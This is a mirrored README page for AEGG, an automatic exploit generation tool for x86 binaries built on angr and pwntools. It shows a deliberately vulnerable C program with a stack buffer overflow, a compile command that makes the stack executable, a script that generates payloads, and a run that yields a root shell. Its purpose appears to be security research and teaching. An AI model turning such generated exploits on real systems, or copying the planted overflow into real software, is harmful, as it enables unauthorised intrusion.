Giter Site home page Giter Site logo

aegg's Introduction

AEGG

AEGG is my simple automatic exploit generation tool. Now only support x86 binary.

Usage

  1. vi vul.c: 
    #include <stdio.h>
#include <unistd.h>
#include <string.h>

char buf[100];

int sample_func() {
    char name[10] = {0};
    read(0, buf, 307);
    strcpy(name, buf);
    printf("input: %s\n", name);
}

int main(void)
{
    printf("Running...\n");
    sample_func();
    printf("Done.\n");
}
  2. complie vul: 
    gcc vul2.c -o vul2 -m32 -g -z execstack
  3. vi my_aegg.py: 
    from aegg import AEGG

binary = './vul'
gg = AEGG(binary)

# generating payload!
gg.hack()

print repr(gg.payloads)
gg.save()

Result

$ python my_aegg.py
...
INFO    | 2016-06-18 00:10:11,717 | aegg.aegg | Start hacking ...
INFO    | 2016-06-17 23:44:43,872 | pwnlib.elf | Stack is executable!
[+] Started program './vul'
INFO    | 2016-06-17 23:44:46,974 | pwnlib.tubes.process | Started program './vul'
[*] Stopped program './vul'
INFO    | 2016-06-17 23:44:47,976 | pwnlib.tubes.process | Stopped program './vul'
INFO    | 2016-06-17 23:44:47,980 | aegg.aegg | Generated!
INFO    | 2016-06-17 23:44:47,980 | aegg.aegg | Completed.
$
$ (cat ./vul.exp; cat) | ./vul
Running...
input: jhh///sh/bin��1�j
                           �̀ÿ @@   @
id
uid=0(root) gid=0(root) groups=0(root)

Dependences

  • angr
  • pwntools

TODO

  • shellcode (ret2stack)

  • ROP (ret2libc)

  • ROPgadget

  • fmtstr exploit

  • AEGG: inputs in exploit_gen instead of paths (for fuzzing)

  • ret2stack: try every buffer

Reference

angr-doc/examples/insomnihack_aeg

(State of) The Art of War: Offensive Techniques in Binary Analysis

AEG: Automatic Exploit Generation

aegg's People

Contributors

ysc21 avatar

Watchers

James Cloos avatar avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.